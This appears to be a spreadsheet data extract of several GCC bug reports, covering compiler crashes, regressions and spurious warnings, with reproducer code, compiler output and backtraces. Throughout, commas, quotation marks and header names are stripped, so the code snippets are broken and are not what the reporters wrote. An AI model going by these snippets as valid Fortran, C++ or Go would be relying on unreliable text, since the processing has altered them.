    <t>TRANSPOSE on rhs of allocatable array assignment gives error with -fcheck=bounds</t>
  </si>
  <si>
    <t>The following code:
program foo
  real allocatable :: a(::)
  real allocatable :: b(::)
  allocate(a(105))
  a = 0.
  b = TRANSPOSE(a)
end program foo
...produces this error message at runtime when compiled with -fcheck=all:
At line 10 of file foo.f90
Fortran runtime error: Array bound mismatch for dimension 1 of array 'b' (1/5)
This is on OS X:
Using built-in specs.
COLLECT_GCC=/Applications/madsdk/bin/gfortran.exec
COLLECT_LTO_WRAPPER=/Applications/madsdk/libexec/gcc/x86_64-apple-darwin11.4.2/4.9.0/lto-wrapper
Target: x86_64-apple-darwin11.4.2
Configured with: ./configure CC='gcc -D_FORTIFY_SOURCE=0' --build=x86_64-apple-darwin11.4.2 --prefix=/Applications/madsdk --with-gmp=/Applications/madsdk --with-mpfr=/Applications/madsdk --with-mpc=/Applications/madsdk --enable-languages=cc++fortran --disable-multilib --disable-nls --disable-libsanitizer
Thread model: posix
gcc version 4.9.0 20140201 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-54455</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: RTL check: expected elt 3 type 'B' have '0' (rtx barrier) in compute_bb_for_insn at cfgrtl.c:418</t>
  </si>
  <si>
    <t>Created attachment 28118
reduced testcase (from gcc.c-torture/compile/pr51767.c)
Compiler output:
$ gcc -fschedule-insns -fselective-scheduling --param max-sched-extend-regions-iters=8 testcase.c
testcase.c: In function 'bar':
testcase.c:11:1: internal compiler error: RTL check: expected elt 3 type 'B' have '0' (rtx barrier) in compute_bb_for_insn at cfgrtl.c:418
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  0x0000000001131fc0 in internal_error(char const* ...) ()
#1  0x000000000096d82b in rtl_check_failed_type1(rtx_def const* int int char const* int char const*) () at /mnt/svn/gcc-trunk/gcc/rtl.c:753
#2  0x00000000006a94b8 in compute_bb_for_insn() () at /mnt/svn/gcc-trunk/gcc/cfgrtl.c:418
#3  0x0000000000c29723 in ix86_reorg() () at /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:33774
#4  0x000000000096d27a in rest_of_handle_machine_reorg() ()
#5  0x000000000090092f in execute_one_pass(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2157
#6  0x0000000000900ce5 in execute_pass_list(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2212
#7  0x0000000000900cf7 in execute_pass_list(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2213
#8  0x0000000000900cf7 in execute_pass_list(opt_pass*) () at /mnt/svn/gcc-trunk/gcc/passes.c:2213
#9  0x00000000006bdd88 in expand_function(cgraph_node*) () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1609
#10 0x00000000006bff02 in compile() () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1803
#11 0x00000000006c0225 in finalize_compilation_unit() () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2089
#12 0x00000000005a1dc0 in c_write_global_declarations() () at /mnt/svn/gcc-trunk/gcc/c/c-decl.c:10116
#13 0x00000000009e8475 in compile_file() () at /mnt/svn/gcc-trunk/gcc/toplev.c:560
#14 0x00000000009ea03a in toplev_main(int char**) () at /mnt/svn/gcc-trunk/gcc/toplev.c:1863
#15 0x00007ffff6e784bd in __libc_start_main () from /lib64/libc.so.6
#16 0x0000000000584d01 in _start ()
Tested revisions:
r190830 - crash
4.7 r188682 - crash
4.6 r188682 - OK</t>
  </si>
  <si>
    <t>GCC-54208</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] compilation error for ubound construct in PARAMETER statements</t>
  </si>
  <si>
    <t>The following reproducer:
program testit
  integer parameter :: n=2
  integer dimension(1-min(n2)/2:n) :: arr
  integer parameter :: i=ubound(arr1)
  write(6*) i
end program testit
fails to compile:
&gt;gfortran  testit.F90
testit.F90:4.33:
  integer parameter :: i=ubound(arr1)
                                 1
Error: Array 'arr' at (1) is a variable which does not reduce to a constant expression
This error causes a problem when compiling GISS's climate model (modelE) which has similar constructs but it is not a problem with other compilers (e.g. intel 12.1)
Additional information:
-----------------------
&gt;gfortran --version
GNU Fortran (GCC) 4.8.0 20120401 (experimental)
Copyright (C) 2012 Free Software Foundation Inc.
&gt;gcc -v -save-temps testit.F90
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/local/other/SLES11/gcc/4.8-20120401/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /gpfsm/dnbsrc/other/GCC/SLES11/4.8-20120401/gcc-4.8-20120401/configure --prefix=/usr/local/other/SLES11/gcc/4.8-20120401 CC=gcc --enable-languages=all
Thread model: posix
gcc version 4.8.0 20120401 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-mtune=generic' '-march=x86-64'
 /usr/local/other/SLES11/gcc/4.8-20120401/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/f951 testit.F90 -cpp=testit.f90 -quiet -v testit.F90 -quiet -dumpbase testit.F90 -mtune=generic -march=x86-64 -auxbase testit -version -fintrinsic-modules-path /usr/local/other/SLES11/gcc/4.8-20120401/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/finclude -o testit.s
GNU Fortran (GCC) version 4.8.0 20120401 (experimental) (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.0 20120401 (experimental) GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
ignoring nonexistent directory /usr/local/other/SLES11/gcc/4.8-20120401/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/other/SLES11/gcc/4.8-20120401/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/finclude
 /usr/local/other/SLES11/gcc/4.8-20120401/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/include
 /usr/local/include
 /usr/local/other/SLES11/gcc/4.8-20120401/include
 /usr/local/other/SLES11/gcc/4.8-20120401/lib/gcc/x86_64-unknown-linux-gnu/4.8.0/include-fixed
 /usr/include
End of search list.</t>
  </si>
  <si>
    <t>carlos.a.cruz</t>
  </si>
  <si>
    <t>GCC-15713</t>
  </si>
  <si>
    <t>compile interpret.cc with -fno-strict-aliasing</t>
  </si>
  <si>
    <t>we should either fix interpret.cc or compile it with
-fno-strict-aliasing.  Andrew points out that 
it has code like this in it:
  jbyte value = (*(jint*)</t>
  </si>
  <si>
    <t>GCC-44974</t>
  </si>
  <si>
    <t>[4.6 Regression] Function with attribute noreturn omits a call to another function with noreturn</t>
  </si>
  <si>
    <t>4.6.0 20100713 r162159 cross target arm-unknown-eabi newlib 1.18
Compile:
arm-unknown-eabi-gcc -O1 -S -o bug.s bug.c
With bug.c:
--8&lt;--
extern void foo1 (int status) __attribute__ ((__noreturn__))
extern void _Exit (int status) __attribute__ ((__noreturn__))
extern void foo3 (int status) __attribute__ ((__noreturn__))
void
foo1 (int status)
{
  _Exit (status)
}
void
_Exit (int status)
{
  foo3 (status)
}
--8&lt;--
Results in:
--8&lt;--
	.global	_Exit
	.type	_Exit %function
_Exit:
	@ Function supports interworking.
	@ Volatile: function does not return.
	@ args = 0 pretend = 0 frame = 0
	@ frame_needed = 0 uses_anonymous_args = 0
	stmfd	sp! {r3 lr}
	bl	foo3
	.size	_Exit .-_Exit
	.align	2
	.global	foo1
	.type	foo1 %function
foo1:
	@ Function supports interworking.
	@ Volatile: function does not return.
	@ args = 0 pretend = 0 frame = 0
	@ frame_needed = 0 uses_anonymous_args = 0
	@ link register save eliminated.
	bx	lr
	.size	foo1 .-foo1
--8&lt;--
I.e. foo1() does not call _Exit() while it should.
Changing -O1 into another level makes it work and changing _Exit() into another function name (but also marked as noreturn) makes it work as well.</t>
  </si>
  <si>
    <t>GCC-722</t>
  </si>
  <si>
    <t>Bug in testing pointer to member functions</t>
  </si>
  <si>
    <t>testing an assignment of pointer to member
functions is a test of the return value of
the member function and not the function
pointer itself. Compiling such code with
-ansi results in warning NULL used in
arithmetic in example code below.
Release:
gcc-2.96
Environment:
RedHat 7.0 Linux-2.2.16-22
How-To-Repeat:
Compile isolated example supplied. g++ -Wall -pedantic -ansi q.cc -o q
See warning:
q.cc: In method `Wik::Wik ()':
q.cc:11: warning: NULL used in arithmetic</t>
  </si>
  <si>
    <t>GCC-61999</t>
  </si>
  <si>
    <t>[4.8/4.9/4.10 Regression] `gfc_simplify_dot_product` causes ICE for constant arguments</t>
  </si>
  <si>
    <t>Following code leads `gcc-mp-4.8 (MacPorts gcc48 4.8.2_2) 4.8.2` and `GNU Fortran (MacPorts gcc47 4.7.3_5) 4.7.3` to ICE.
```fortran
program main
   use intrinsic:: iso_fortran_env only: output_unit
   implicit none
   write(output_unit *) dot_product([1 2] [2.0 3.0])
   stop
end program main
```
```
f951: internal compiler error: in gfc_simplify_dot_product at fortran/simplify.c:1886
f951: internal compiler error: Abort trap: 6
gfortran-mp-4.8: internal compiler error: Abort trap: 6 (program f951)
Abort trap: 6
```</t>
  </si>
  <si>
    <t>GCC-8044</t>
  </si>
  <si>
    <t>gcc 3.1.1 -O2 error: Internal compiler error in subst_stack_regs_pat at reg-stack.c:1441</t>
  </si>
  <si>
    <t>Compile the three-line program in How to repeat with the -O2 flag.
[adb@localhost bug]$ gcc -O2 out.c
out.c: In function `foo':
out.c:4: Internal compiler error in subst_stack_regs_pat at reg-stack.c:1441
Please submit a full bug report
with preprocessed source if appropriate.
On my machine gcc is configured as follows:
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux-gnu/3.1.1/specs
Configured with: ../configure --prefix=/usr --libdir=/usr/lib --with-slibdir=/lib --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --enable-long-long --with-gxx-include-dir=/usr/include/g++-v31 --enable-languages=cc++f77objcjava --host=i586-mandrake-linux-gnu --with-system-zlib
Thread model: posix
gcc version 3.1.1 (Mandrake Linux 8.3 3.1.1-0.7mdk)
Release:
gcc version 3.1.1 (Mandrake Linux 8.3 3.1.1-0.7mdk)
How-To-Repeat:
Compile the following code with -O2:
double foo()
{
  bar(0)
}</t>
  </si>
  <si>
    <t>GCC-79095</t>
  </si>
  <si>
    <t>[7 regression] spurious stringop-overflow warning</t>
  </si>
  <si>
    <t>hi -
gcc version 7.0.0 20170111 gives what appears to be a spurious warning
for this example when compiling with -O3 (tested on x86_64-pc-linux-gnu):
================================================================
#include 
void foo(std::vector 
void vtest()
{
  std::vector v
  foo (v)
  //if (v.size() &gt; 0)
  {
    v.resize (v.size()-1)
  }
}
================================================================
$ gcc -c -O3  x.cc
In function â€˜void vtest()â€™:
cc1plus: warning: â€˜void* __builtin_memset(void* int long unsigned int)â€™: specified size 18446744073709551612 exceeds maximum object size 9223372036854775807 [-Wstringop-overflow=]
cc1plus: warning: â€˜void* __builtin_memset(void* int long unsigned int)â€™: specified size 18446744073709551612 exceeds maximum object size 9223372036854775807 [-Wstringop-overflow=]
cc1plus: warning: â€˜void* __builtin_memset(void* int long unsigned int)â€™: specified size 18446744073709551612 exceeds maximum object size 9223372036854775807 [-Wstringop-overflow=]
The size reported is -4 as an unsigned so the warning must be coming from
considering the possibility that v.size() is 0.  But we really shouldn't
be warning unless it can be shown that foo() can leave the vector empty
and in any case adding the explicit test on the vector size (shown commented
out) does not get rid of the warning.</t>
  </si>
  <si>
    <t>sss</t>
  </si>
  <si>
    <t>GCC-21207</t>
  </si>
  <si>
    <t>[4.0 regression] ICE folding large floating-point values</t>
  </si>
  <si>
    <t>Trying gcc4.0.0 on our sources I get an ICE.
This ICE does not occur with gcc-4.0-20050326.
Michael Cieslinski
g++400 -O2 -c mediag.ii -o mediag.o
mediag.ii: In static member function 'static ErrorValue 
MetisImageInterface::calcLutPlot()':
mediag.ii:71923: internal compiler error: in fold_convert at fold-const.c:1922
Please submit a full bug report with preprocessed source if appropriate.
g++400 -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.0.0/configure --prefix=/usr/local/gcc400 --program-
suffix=400 --with-arch=opteron --enable-languages=cc++
Thread model: posix
gcc version 4.0.0</t>
  </si>
  <si>
    <t>GCC-4328</t>
  </si>
  <si>
    <t>Internal compiler error in gen_reg_rtx at emit-rtl.c:542</t>
  </si>
  <si>
    <t>Compiling fivel.c optimized for Ultrasparc generates an
internal compiler error
Release:
3.0.1
Environment:
System: SunOS scooby 5.8 Generic_108528-10 sun4u sparc SUNWSun-Blade-100
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../gcc-3.0.1/configure --prefix=/opt/local --enable-threads --enable-gcj
How-To-Repeat:
scooby&gt; gcc -v --save-temps -ansi -c -mcpu=v9 -mtune=ultrasparc -Wa-xarch=v8plus -O2 -Wall -I../../source fivel.c
Reading specs from /opt/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/specs
Configured with: ../gcc-3.0.1/configure --prefix=/opt/local --enable-threads --enable-gcj
Thread model: posix
gcc version 3.0.1
 /opt/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/cpp0 -lang-c -std=c89 -v -I../../source -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=1 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc -D__sun -D__unix -Asystem=unix -Asystem=svr4 -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Wall -D__sparc_v9__ -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc fivel.c fivel.i
GNU CPP version 3.0.1 (cpplib) (sparc)
#include ... search starts here:
#include  search starts here:
 ../../source
 /usr/local/include
 /opt/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include
 /opt/local/sparc-sun-solaris2.8/include
 /usr/include
End of search list.
 /opt/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/cc1 -fpreprocessed fivel.i -quiet -dumpbase fivel.c -mcpu=v9 -mtune=ultrasparc -ansi -O2 -Wall -ansi -version -o fivel.s
GNU CPP version 3.0.1 (cpplib) (sparc)
GNU C version 3.0.1 (sparc-sun-solaris2.8)
        compiled by GNU C version 3.0.1.
fivel.c: In function `fivel':
fivel.c:310: Internal compiler error in gen_reg_rtx at emit-rtl.c:542
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>vanhoof</t>
  </si>
  <si>
    <t>GCC-59280</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE with attribute((constructor(invalid)))</t>
  </si>
  <si>
    <t>//void foo (void) { }
void func3 (char *) __attribute__((constructor(foo)))
This ICEs in C (not in C++) because of the call to default_conversion. I noticed while trying to use the same call to default_conversion in other builtins that have a more extensive testsuite.</t>
  </si>
  <si>
    <t>GCC-52476</t>
  </si>
  <si>
    <t>[DR 518] Unordered multimap reorders equivalent elements</t>
  </si>
  <si>
    <t>gcc 4.7.0 20120225 (experimental) and also gcc 4.6.3 perform reordering of equivalent elements of unordered_multimap in violation of the standard specification.
Testcase:
//---------
#include 
#include 
void printHashTable(const std::unordered_multimap&amp; map)
{
  for (unsigned i = 0 i &lt; map.bucket_count() ++i) {
    std::cout &lt;&lt; b[ &lt;&lt; i &lt;&lt; ]: &lt;&lt; std::endl
    for (auto it = map.begin(i) it != map.end(i) ++it) {
      std::cout first) &lt;&lt;  [
                first second &lt;&lt; ] &lt;&lt; std::endl
    }
  }
  std::cout &lt;&lt; ---------------------- &lt;&lt; std::endl
}
int main()
{
  std::unordered_multimap dict = {
                {00}
                {10}
                {20}
                {30}
                {40}
                {11}
  }
  printHashTable(dict)
  dict.insert({{31}
               {32}
               {50}
              })
  printHashTable(dict)
  dict.max_load_factor(0.5)
  printHashTable(dict)
}
//---------
The observed output is:
//---------
b[0]:
   0 [00]
b[1]:
   1 [11]
   1 [10]
b[2]:
   2 [20]
b[3]:
   3 [30]
b[4]:
   4 [40]
b[5]:
b[6]:
----------------------
b[0]:
   0 [00]
b[1]:
   1 [10]
   1 [11]
b[2]:
   2 [20]
b[3]:
   3 [32]
   3 [31]
   3 [30]
b[4]:
   4 [40]
b[5]:
   5 [50]
b[6]:
b[7]:
b[8]:
b[9]:
b[10]:
----------------------
b[0]:
   0 [00]
b[1]:
   1 [11]
   1 [10]
b[2]:
   2 [20]
b[3]:
   3 [30]
   3 [31]
   3 [32]
b[4]:
   4 [40]
b[5]:
   5 [50]
b[6]:
b[7]:
b[8]:
b[9]:
b[10]:
b[11]:
b[12]:
b[13]:
b[14]:
b[15]:
b[16]:
b[17]:
b[18]:
b[19]:
b[20]:
b[21]:
b[22]:
b[23]:
b[24]:
b[25]:
b[26]:
b[27]:
b[28]:
----------------------
//---------
The relevant library constraints are described in [unord.req] p6:
Mutating operations on unordered containers shall preserve the relative order of elements within each equivalent-key group unless otherwise specified.
and in [unord.req] p9:
For unordered_multiset and unordered_multimap rehashing preserves the relative ordering of equivalent elements.
The actual defects in above output are the following:
1) The second output should not reorder
   1 [11]
   1 [10]
to
   1 [10]
   1 [11]
2) The third output should not reorder
   1 [10]
   1 [11]
to
   1 [11]
   1 [10]
and it should not reorder
   3 [32]
   3 [31]
   3 [30]
to
   3 [30]
   3 [31]
   3 [32]</t>
  </si>
  <si>
    <t>GCC-54631</t>
  </si>
  <si>
    <t>vxworks.c fails to compile</t>
  </si>
  <si>
    <t>I just pulled in the latest changes and vxworks.c no longer compiles.  The error is at bottom.
I think this has to do with the upgrade to C++.  The code in question does this:
elt = VEC_quick_push(constructor_elt v NULL)
The problem with this is that NULL is not convertible to const constructor_elt &amp;.  I think that with the old C API this would just construct a new object but that doesn't work anymore.
Changing the code to construct the object first and then add it to the vector should work but I don't know enough about the code to be sure.
As a question should these files be changed to use the C++ API?  Or should they stick with pretending that they're straight C?
Thanks!
Robert Mason
../../gcc/gcc/config/vxworks.c: In function â€˜tree_node* vxworks_emutls_var_init(tree tree tree)â€™:
../../gcc/gcc/config/vxworks.c:105:9: error: no matching function for call to â€˜vec_t::quick_push(NULL const char [31] int const char [24])â€™
../../gcc/gcc/config/vxworks.c:105:9: note: candidate is:
In file included from ../../gcc/gcc/tree.h:29:0
                 from ../../gcc/gcc/config/vxworks.c:29:
../../gcc/gcc/vec.h:783:1: note: T* vec_t::quick_push(const T&amp; const char* unsigned int const char*) [with T = constructor_elt_d]
../../gcc/gcc/vec.h:783:1: note:   no known conversion for argument 1 from â€˜long intâ€™ to â€˜const constructor_elt_d&amp;â€™
../../gcc/gcc/config/vxworks.c:109:9: error: no matching function for call to â€˜vec_t::quick_push(NULL const char [31] int const char [24])â€™
../../gcc/gcc/config/vxworks.c:109:9: note: candidate is:
In file included from ../../gcc/gcc/tree.h:29:0
                 from ../../gcc/gcc/config/vxworks.c:29:
../../gcc/gcc/vec.h:783:1: note: T* vec_t::quick_push(const T&amp; const char* unsigned int const char*) [with T = constructor_elt_d]
../../gcc/gcc/vec.h:783:1: note:   no known conversion for argument 1 from â€˜long intâ€™ to â€˜const constructor_elt_d&amp;â€™
../../gcc/gcc/config/vxworks.c:114:9: error: no matching function for call to â€˜vec_t::quick_push(NULL const char [31] int const char [24])â€™
../../gcc/gcc/config/vxworks.c:114:9: note: candidate is:
In file included from ../../gcc/gcc/tree.h:29:0
                 from ../../gcc/gcc/config/vxworks.c:29:
../../gcc/gcc/vec.h:783:1: note: T* vec_t::quick_push(const T&amp; const char* unsigned int const char*) [with T = constructor_elt_d]
../../gcc/gcc/vec.h:783:1: note:   no known conversion for argument 1 from â€˜long intâ€™ to â€˜const constructor_elt_d&amp;â€™
make[2]: *** [vxworks.o] Error 1
make[1]: *** [all-gcc] Error 2
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-57938</t>
  </si>
  <si>
    <t>Compiler breaks when a lambda expression is used as a default parameter in a constructor</t>
  </si>
  <si>
    <t>Created attachment 30530
contains both the .cpp and the .ii files
When specifying a lambda as a default parameter in the constructor of a class the compiler breaks with the error Lazy.cpp:37:42: internal compiler error: in tsubst_copy at cp/pt.c:12141
The error does not appear if I pass the exact same lambda expression explicitly as a constructor parameter.
This breaks:
template
class Lazy {
...
public:
   explicit Lazy(const std::function&amp;     init
		 const std::function })
		):m_object(0)m_initializer(init)m_finalizer(fini) { }
...
}
...
Lazy lt([]{ return new Test(42) })
...
This does not:
template
class Lazy {
...
public:
   explicit Lazy(const std::function&amp;     init
		 const std::function&amp; fini
		):m_object(0)m_initializer(init)m_finalizer(fini) { }
...
}
...
Lazy lt([]{ return new Test(42) }
              [](Type *object) -&gt; void { delete object })
...
I attached both a minimal .cpp file that produces the error and the .ii file created by gcc.
This is the full output of the compilation:
C:\test&gt;g++ -v -std=c++11 -save-temps -o Lazy.exe Lazy.cpp
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=c:/mingw/bin/../libexec/gcc/i686-pc-mingw32/4.7.2/lto-wrapper.exe
Target: i686-pc-mingw32
Configured with: ../src/configure --prefix=/c/temp/gcc/dest --with-gmp=/c/temp/gcc/gmp --with-mpfr=/c/temp/gcc/mpfr --with-mpc=/c/temp/gcc/mpc --enable-languages=cc++ --with-arch=i686 --with-tune=generic --disable-libstdcxx-pch --disable-nls --disable-shared --disable-sjlj-exceptions --disable-win32-registry --enable-checking=release --enable-lto
Thread model: win32
gcc version 4.7.2 (GCC)
COLLECT_GCC_OPTIONS='-v' '-std=c++11' '-save-temps' '-o' 'Lazy.exe' '-mtune=generic' '-march=i686'
 c:/mingw/bin/../libexec/gcc/i686-pc-mingw32/4.7.2/cc1plus.exe -E -quiet -v -iprefix c:\mingw\bin\../lib/gcc/i686-pc-mingw32/4.7.2/ Lazy.cpp -mtune=generic -march=i686 -std=c++11 -fpch-preprocess -o Lazy.ii
ignoring nonexistent directory c:\mingw\bin\../lib/gcc/i686-pc-mingw32/4.7.2/../../../../i686-pc-mingw32/include
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/i686-pc-mingw32/4.7.2/../../../../include/c++/4.7.2
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/i686-pc-mingw32/4.7.2/../../../../include/c++/4.7.2/i686-pc-mingw32
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/i686-pc-mingw32/4.7.2/../../../../include/c++/4.7.2/backward
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/i686-pc-mingw32/4.7.2/include
ignoring nonexistent directory c:/temp/gcc/dest/include
ignoring nonexistent directory /c/temp/gcc/dest/include
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/i686-pc-mingw32/4.7.2/include-fixed
ignoring nonexistent directory c:/mingw/lib/gcc/../../lib/gcc/i686-pc-mingw32/4.7.2/../../../../i686-pc-mingw32/include
ignoring duplicate directory /mingw/include
#include ... search starts here:
#include  search starts here:
 c:\mingw\bin\../lib/gcc/i686-pc-mingw32/4.7.2/../../../../include/c++/4.7.2
 c:\mingw\bin\../lib/gcc/i686-pc-mingw32/4.7.2/../../../../include/c++/4.7.2/i686-pc-mingw32
 c:\mingw\bin\../lib/gcc/i686-pc-mingw32/4.7.2/../../../../include/c++/4.7.2/backward
 c:\mingw\bin\../lib/gcc/i686-pc-mingw32/4.7.2/include
 c:\mingw\bin\../lib/gcc/i686-pc-mingw32/4.7.2/../../../../include
 c:\mingw\bin\../lib/gcc/i686-pc-mingw32/4.7.2/include-fixed
End of search list.
COLLECT_GCC_OPTIONS='-v' '-std=c++11' '-save-temps' '-o' 'Lazy.exe' '-mtune=generic' '-march=i686'
 c:/mingw/bin/../libexec/gcc/i686-pc-mingw32/4.7.2/cc1plus.exe -fpreprocessed Lazy.ii -quiet -dumpbase Lazy.cpp -mtune=generic -march=i686 -auxbase Lazy -std=c++11 -version -o Lazy.s
GNU C++ (GCC) version 4.7.2 (i686-pc-mingw32)
        compiled by GNU C version 4.7.2 GMP version 5.0.5 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.7.2 (i686-pc-mingw32)
        compiled by GNU C version 4.7.2 GMP version 5.0.5 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 875b33a3736d797e27eafd03743d6f46
Lazy.cpp: In constructor 'Lazy::Lazy(const std::function&amp; const std::function&amp;) [with Type = Test]':
Lazy.cpp:37:42: internal compiler error: in tsubst_copy at cp/pt.c:12141
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
C:\test&gt;
To double-check I tried the same exact code with the VC++ version shipping with Visual Studio 2012 and it compiles and executes fine.</t>
  </si>
  <si>
    <t>francesco.nidito</t>
  </si>
  <si>
    <t>GCC-32955</t>
  </si>
  <si>
    <t>gfortran.dg/value_4.f90 gives a compiling error with -fdefault-integer-8</t>
  </si>
  <si>
    <t>Compiling gfortran.dg/value_4.f90 with -fdefault-integer-8 gives the following error:
/opt/gcc/gcc-4.3-work/gcc/testsuite/gfortran.dg/value_4.f90:76.6:
  if (delta ((3 * i) j)) call abort ()
     1
Error: There is no specific function for the generic 'delta' at (1)
gcc version 4.3.0 20070731 (experimental)</t>
  </si>
  <si>
    <t>GCC-18327</t>
  </si>
  <si>
    <t>[3.3 Regression] ICE while compiling valid c code with g++</t>
  </si>
  <si>
    <t xml:space="preserve">
[0:38 wolf@bajzel:~/qqq/openttd-0.3.4]% g++ ai.c -c
In file included from ai.c:48:
table/ai_rail.h:36: internal compiler error: in tree_low_cst at tree.c:3318
Please submit a full bug report
with preprocessed source if appropriate.
Environment:
System: Linux bajzel 2.6.9 #3 Tue Oct 19 12:59:34 CEST 2004 i686 AMD_Athlon(tm)_ unknown PLD Linux
Architecture: i686
host: i686-pld-linux-gnu
build: i686-pld-linux-gnu
target: i686-pld-linux-gnu
configured with: ../configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --infodir=/usr/share/info --mandir=/usr/share/man --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-languages=cc++f77 --enable-c99 --enable-long-long --enable-multilib --enable-nls --with-gnu-as --with-gnu-ld --with-system-zlib --with-slibdir=/lib --without-x athlon-pld-linux
How-To-Repeat:
1. Download http://dl.sf.net/openttd/openttd-0.3.4.tar.bz2
2. Remove -DWITH_REV from Makefile:240
3. Add (char*) before malloc in strgen/strgen.c:419
4. make CC=g++</t>
  </si>
  <si>
    <t>wolf</t>
  </si>
  <si>
    <t>GCC-50165</t>
  </si>
  <si>
    <t>[4.7 Regression] Huge build time regression (Firefox lto build)</t>
  </si>
  <si>
    <t>Since Diegos patches (rev. 177571 177661 177704) went in
lto1 seems to run forever (I've killed it after 40 minutes) when libxul
is linked during a Firefox LTO build. 
It used to finish in 4-5 minutes before.
This is a profile captured during the lto1 run:
(perf record -ag sleep 5 and then perf report -v -g --stdio)
 # Events: 5K cycles
#
# Overhead          Command                                    Shared Object                                                      Symbol
# ........  ...............  ...............................................  ..........................................................
#
    93.93%         lto1-wpa  /usr/libexec/gcc/x86_64-pc-linux-gnu/4.7.0/lto1  0x74a633         d [.] htab_expand
                   |
                   --- htab_expand
     1.05%          swapper  [kernel.kallsyms]                                0xffffffff810460c2 k [k] default_idle
...
and sometimes (much more infrequent) this profile:
    40.25%         lto1-wpa  /usr/libexec/gcc/x86_64-pc-linux-gnu/4.7.0/lto1  0x74ad05         d [.] htab_find_slot_with_hash
                   |
                   --- htab_find_slot_with_hash
    30.74%         lto1-wpa  /usr/libexec/gcc/x86_64-pc-linux-gnu/4.7.0/lto1  0x225b10         d [.] eq_string_slot_node
                   |
                   --- eq_string_slot_node
     2.06%         lto1-wpa  /lib/libz.so.1.2.5   
...</t>
  </si>
  <si>
    <t>GCC-61204</t>
  </si>
  <si>
    <t>gccgo: ICE in in fold_convert_loc [GoSmith]</t>
  </si>
  <si>
    <t>$ gccgo -v
Using built-in specs.
COLLECT_GCC=gccgo
COLLECT_LTO_WRAPPER=libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --enable-languages=cc++go --disable-bootstrap --enable-checking=yes --disable-multilib --prefix=gcc_trunk/install
Thread model: posix
gcc version 4.10.0 20140516 (experimental) (GCC) 
The program is:
package main
func main() {
	type id2 chan map[uintptr]string
	type id3 [0]string
	type id4 float64
	_ = &lt;-&lt;-make(chan id2 cap(id3([0]string{})))
	type id5 id2
	_ _ = &lt;-&lt;-make(chan chan string)
	var id6 id5 = id5(id2(make(chan map[uintptr]string ((1) + ((&lt;-make(chan int ((1) + ((1) + (([]int{})[((1) * (1))]))))) * ((1) + ((((((([]int{})[1]) + (&lt;-make(chan int))) * ((&lt;-make(chan int)) + (1))) * (&lt;-&lt;-&lt;-make(chan chan chan int 1))) + (1)) * (&lt;-make(chan int)))))))))
	type id7 id3
	_ _ _ = map[id4]bool{} ([]float64{})[1] (((&lt;-&lt;-&lt;-&lt;-make(chan chan chan chan int ((&lt;-&lt;-make(chan chan int)) * (1)))) * (1)) + (([]int{})[((((&lt;-&lt;-&lt;-&lt;-&lt;-make(chan chan chan chan chan int 1)) + ((1) * (((&lt;-&lt;-make(chan chan []int))[1]) + (1)))) * ((([]int{})[&lt;-&lt;-make(chan chan int ((1)*(1)))]) + ((&lt;-&lt;-make(chan chan int)) * ((1) + (&lt;-make(chan int)))))) * (&lt;-make(chan int 1)))]))
	id8 := id7(id3([0]string{}))
